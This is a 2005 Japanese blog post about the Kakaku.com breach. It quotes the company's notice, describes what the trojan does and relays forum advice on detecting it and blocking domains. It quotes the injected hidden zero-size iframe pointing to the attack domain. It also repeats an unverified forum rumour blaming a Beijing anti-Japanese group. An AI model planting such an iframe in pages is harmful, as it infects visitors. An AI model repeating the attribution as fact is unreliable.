|
|
|
May 16, 2005
カテゴリ:ネットとPC
『価格.com』が不正アクセスで一時閉鎖になったらしい。
楽天広場のほかの方の日記を見て知りました。 最新のニュース記事 「最高レベルのセキュリティが破られた」――カカクコム、不正アクセス事件を説明 「価格.com:重要なお知らせ」 http://www.kakaku.com/ ************************************************************************** <これまでの経緯> 5月11日にプログラムの異常が発覚。調査したところ不正アクセスが原因であり、一種の サイバーテロ的な行為であると認識しました。 即時警察当局等とも相談し、24時間監視体制でサイト運営を続けながらプログラム改ざんの 影響や対抗策、犯人の調査を続けて参りましたが不正アクセスは止まず、改ざんの範囲が拡大 したため止む無く5月14日よりサイトを閉鎖しております。 事件発覚直後より代表取締役 穐田誉輝を委員長とするセキュリティ委員会を設置し、警視庁 ハイテク犯罪対策総合センター、顧問弁護士、システムセキュリティ会社及び各種専門家の方々 の協力も得て、原因究明及び再発防止策の徹底調査を実施しております。 一刻も早いサービスの再開に向け全社を上げて対応しておりますが、復旧時期は一週間後を 目処にしております。(抜粋) ************************************************************************** これを見ると… 5月11日にプログラムの異常が発覚 止む無く5月14日よりサイトを閉鎖 この間は、どうなってたんですかね? ************************************************************************** この改ざんにより、何者かが当社サイトを媒介としてウィルスソフトを無差別に送りつけ、 当社サイトを閲覧されたお客様がウィルスファイルを取込んでしまった可能性があります。 判明しているウィルスは「trojandownloader.small.AAO」「PSW.Delf.FZ」の2種類であり、 アンチウィルスソフト「NOD32」にて対処可能な事を確認しております。 ************************************************************************** とありますが… 当社サイトを閲覧されたお客様がウィルスファイルを取込んでしまった可能性 これって即刻閉鎖だったんでは??? 問題は拡大してきたようです。 「価格.comがクラッキングされた件(´・ω・)暫定まとめサイト」 http://musyoku-waste.hp.infoseek.co.jp/test/index.htm ここ楽天広場でも結構話題になってきました。 っていうのもウィルス感染の可能性がサイト閲覧者ってことになってる! オレ行ったよ! 自PCのウィルスバスターでは検知できないってことで シマンテック:オンラインスキャンで検索しました。 出てこんかった…ほ。 シマンテックのオンラインスキャンも今一、検出率が悪いって話も出てまして まだまだ安心できません! 困った困った(;´Д`A 結構、たちの悪いウィルスらしいです。 可能性のある人はスキャンしてみてください! ************************************************************************** どんなウィルス? メモリ常駐型ウィルスだよ。恐ろしいやつだ。 Trojan.PSW.Ajim_bbs (別名:Trojan.PSW.Delf) Trojan.PSW.Ajim_bbsが実行されると、次のことを行います。 自分自身の新しいコピーを%windir%Winupdate.exeおよび%windir%System32Internets.exeとして作成します。 トロイの木馬は既存の%windir%Winver.exeファイルを自分自身で上書きします。 また、オリジナルの%windir%Hostsファイルを独自の特別なHostsファイルで上書きします。 トロイの木馬は自分自身が最初に実行されたフォルダと同じフォルダにSet.iniファイルを作成します。 また、Set.iniファイルを%windir%Desktopフォルダにコピーすることで、そのファイルを Windowsのデスクトップに表示します。 トロイの木馬は次のレジストリキーを、.exeファイルが実行されるか、 または.txtファイルが開かれるときに自分自身が実行されるように改変します。 Trojan.PSW.Ajim_bbsはメモリに常駐し、ユーザ名およびパスワードと思われる情報を探し出します。 Trojan.PSW.Ajim_bbsはまた、既定のURLやホームページなど、Internet Explorerの設定を改変します。 トロイの木馬はメモリに常駐している間、ユーザがProcess Viewerプログラム (このトロイの木馬上のプロセスを終了するために使用可能なプログラム)を実行しようとした場合、 それを検知しエラーメッセージを表示します。 ************************************************************************** 要するに、結構やばいッス!! 感染拡大の可能性もあるので できるだけ早くスキャンしたほうが良いようです。 (といってもソフトによって対策まちまちだしなぁ…orz) F-Secure Anti-Virus Client Security Kaspersky AntiVirus Personal 5.0.227 NOD32 ANTIDOTE BitDefender Free Edition では検出できるようです。 【追 記】 とりあえず"検出方法の暫定版"と"なんとかする方法"が出ました。 ************************************************************************** 検出方法 暫定版 491 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 13:56:43 ID:ah4mpDvA 【検出方法暫定版】 まずC ドライブを.cssで5月11以降でファイル検索 ↓ 見つかったら感染の可能性 ↓ NOD32などで駆除 ↓ 見つからなかった人も見つかった人も ↓ その後の感染防止に j4sb.com shtm1.com 0x61.com の三つのサイトへのアクセスをブロックする ソフトはProxomitron、avast! などプロキシーとして動作して 特定のサイトへのアクセスを防止する機能を持ったものをつかう。 ************************************************************************** ************************************************************************** とにかく早くなんとかしたい 334 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 13:15:30 ID:5oc9ocYh ★★★★★★★★★★★★★★★★★★★★ 現状の最善な対処法。 ・ノートンなどと併用しても問題ないBitDefender Free Editionを導入 http://www.altech-ads.com/product/10000839.htm ・パターンファイル更新後、全スキャン。 ・ウイルスを発見したら削除 今回問題のウイルスの名称は (BehavesLike:Win32.AV-Killer) ・常設機能が切れる頃には、ノートンやバスターが対処していると 思われるので、BitDefender Free Editionアンインストール。 ★★★★★★★★★★★★★★★★★★★★ これで問題なし。 ※価格コムが推奨しているNOD32について NOD32はノートンやバスターなどの他のアンチウイルスとの併用が 出来ません。説明書で他のアンチウイルスソフトウェアをアンイストール してからインストールするように間いてあります。併用すると不具合 発生の危険あり。 ************************************************************************** 2ちゃんねる有志の方々、感謝です! 【追 記2】 あやしいと噂されているサイトです。 ************************************************************************** FAQ (正しいかは知らん) Q.価格.com以外に同様の被害の可能性があるサイトはあるの? A.Googleで検索すると、同様の被害の可能性があるサイトがあるようです。 http://www.google.com/search?num=50&hl=ja&lr=&q=%22j4sb.com%22 こちらのアドレスで引っかかるサイトを訪れる場合は注意しましょう。 ************************************************************************** 要するに"j4sb.com"のアドレスがあやしいらしい。 <iframe src=http://www.j4sb.com/count/counter.ap?id=a02 width=0 height=0></iframe> ↑※絶対にこのURLにいかないでください。 ってソースにあるサイトがあやしくて(というかハッキングされている可能性がある) ウィルスに感染する可能性があるらしい。 HTMLの分かる人だったら分かると思いますが、 タグがインラインフレームで幅・高さ0なので実際にはページに表示されません。 ************************************************************************** 噂。 255 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 12:57:16 ID:+VguF0Vj 犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。 スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、 ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22 j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。 whoisでこれらのサイト情報を検索すると ttp://whois.ansi.co.jp/?key=shtm1.com ttp://whois.ansi.co.jp/?key=0x61.com Admin Name........... pi ger Admin Address........ hidden Admin Address........ Admin Address........ Beijing Admin Address........ 123456 Admin Address........ BJ Admin Address........ CN Admin Email.......... fuckjpmm@china.com Admin Phone.......... +86.1012345678 Admin Fax............ +86.1012345678 と出てきます。 fuckjpmm とは "Fuck Japanese!" どう見ても反日です。 ************************************************************************** あくまでも噂です。 ************************************************************************** 以下の3つのURLが非常にヤヴァイらしいって噂です、悪用すると逮捕かも。踏むの嫌だし、サーバー設置国も未確認です。 ・www.j4sb.com (米国) ・www.shtm1.com(中国) ・www.0x61.com (中国) ************************************************************************** 今回の原因スクリプトの出所は、アメリカっぽいですね。 といっても価格.comにハックしたのは誰か分からんのですけど。 みつかるかな? 当方は、ウィルスバスターで【TROJ_DELF.RM】に関する発表があったので 検索してみたら感染していませんでした。 ほ。 ただもしかしたら今度は楽天かもって思ったら… ぶるぶる ((´д`)) お気に入りの記事を「いいね!」で応援しよう
[ネットとPC] カテゴリの最新記事
|
|
